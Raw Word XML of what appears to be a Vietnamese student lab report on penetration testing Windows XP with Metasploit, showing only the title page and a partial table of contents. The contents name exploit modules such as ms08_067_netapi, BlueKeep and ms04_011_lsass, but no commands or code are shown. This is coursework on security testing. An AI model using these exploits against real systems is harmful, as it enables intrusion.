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tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="963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1180"/>
        <w:gridCol w:w="8459"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="009B135C" w:rsidR="0022224F" w14:paraId="1BF8C63B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1180" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="009B135C" w:rsidR="0022224F" w:rsidRDefault="0031173D" w14:paraId="1B791A62" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="txtTieuDe02"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:name="_Hlk129268248" w:id="0"/>
            <w:bookmarkStart w:name="_Hlk129271956" w:id="1"/>
            <w:bookmarkStart w:name="_Hlk129273108" w:id="2"/>
            <w:r w:rsidRPr="009B135C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7965A32E" wp14:editId="4B320A3B">
                  <wp:extent cx="609600" cy="609600"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1" name="Picture 1"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go&#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459" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="009B135C" w:rsidR="008E3F20" w:rsidP="008E3F20" w:rsidRDefault="008E3F20" w14:paraId="0FF5EBEF" w14:textId="31D76041">
            <w:pPr>
              <w:pStyle w:val="txtTieuDe01"/>
            </w:pPr>
            <w:r w:rsidRPr="009B135C">
              <w:t>KIỂM THỬ XÂM NHẬP VỚI Metasploit</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="009B135C" w:rsidR="002A5903" w:rsidP="008E3F20" w:rsidRDefault="00984CAE" w14:paraId="282479B8" w14:textId="56ECC8D6">
            <w:pPr>
              <w:pStyle w:val="txtTieuDe01"/>
            </w:pPr>
            <w:r w:rsidRPr="009B135C">
              <w:t>TRÊN HỆ ĐIỀU HÀNH WIN</w:t>
            </w:r>
            <w:r w:rsidRPr="009B135C" w:rsidR="003F210D">
              <w:t>DOWS</w:t>
            </w:r>
            <w:r w:rsidR="00016CFB">
              <w:t xml:space="preserve"> XP</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="009B135C" w:rsidR="0022224F" w:rsidRDefault="0022224F" w14:paraId="6868EA7E" w14:textId="722BD3AE">
            <w:pPr>
              <w:pStyle w:val="txtTieuDe02"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidRPr="009B135C" w:rsidR="0022224F" w:rsidRDefault="0022224F" w14:paraId="31D992D6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="0022224F" w:rsidRDefault="0031173D" w14:paraId="02E2E793" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">Họ và tên Sinh viên: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="009B135C" w:rsidR="0022224F" w:rsidRDefault="0031173D" w14:paraId="55DA9EFC" w14:textId="6134567C">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>Mã Sinh viên:</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>Nhóm</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C" w:rsidR="00C564D3">
        <w:t xml:space="preserve"> học phần:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkEnd w:id="2"/>
    <w:p w:rsidRPr="009B135C" w:rsidR="000965CC" w:rsidP="3CCA2F35" w:rsidRDefault="000965CC" w14:paraId="05A98B09" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="782"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:id w:val="-2036571086"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="007142BC" w:rsidRDefault="0031173D" w14:paraId="604E3ECD" w14:textId="1DB4CE7D">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r w:rsidRPr="009B135C">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="009B135C">
            <w:rPr>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="009B135C">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:history="1" w:anchor="_Toc145594621">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</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Giới thiệu</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594621 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="34CC35D6" w14:textId="7896EE6F">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22">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</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ruy cập từ xa đến Kali Linux</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594622 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="193A13C8" w14:textId="3E27FA55">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23">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</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ấn công Windows XP:  ms08_067_netapi</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594623 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="6415AC9B" w14:textId="2DDFAB49">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24">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.</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Thực hành</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594624 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="2E8BA50E" w14:textId="5B9312D1">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25">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.</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Truy xuất từ xa đến máy Windows XP</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594625 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="3E47CF65" w14:textId="56E9C5BF">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26">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.</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NOTE Các lệnh chính</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594626 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="63EC3034" w14:textId="1D70174A">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27">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.</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ấn công Windows XP: ms10_018_ie_behaviors</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594627 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="770224E9" w14:textId="082C5758">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28">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.</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ấn công Windows XP: cve_2019_0708_bluekeep</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594628 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="284EFFAC" w14:textId="262F376D">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29">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1.</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Thực hành</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594629 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="79B33B3A" w14:textId="76835724">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0">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.</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Note</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594630 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="6BF426CA" w14:textId="6A2330AF">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31">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.</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ấn công Windows XP:  ms04_011_lsass</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594631 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="10810401" w14:textId="61C849D4">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2">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1.</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Kịch bản</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594632 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="40834E24" w14:textId="15853562">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3">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.</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Thực hành</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594633 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="08598244" w14:textId="0F509445">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4">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3.</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NOTE Các lệnh chính</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594634 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="6CE70D3E" w14:textId="5A7F6869">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35">
            <w:r w:rsidRPr="00EB07DC" w:rsidR="007142BC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.</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ấn công Windows XP: ms07_017_ani_loadimage_chunksize</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145594635 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="007142BC">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007142BC" w:rsidRDefault="004A0A3F" w14:paraId="76F3F99B" w14:textId="4FE80DA3">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6">
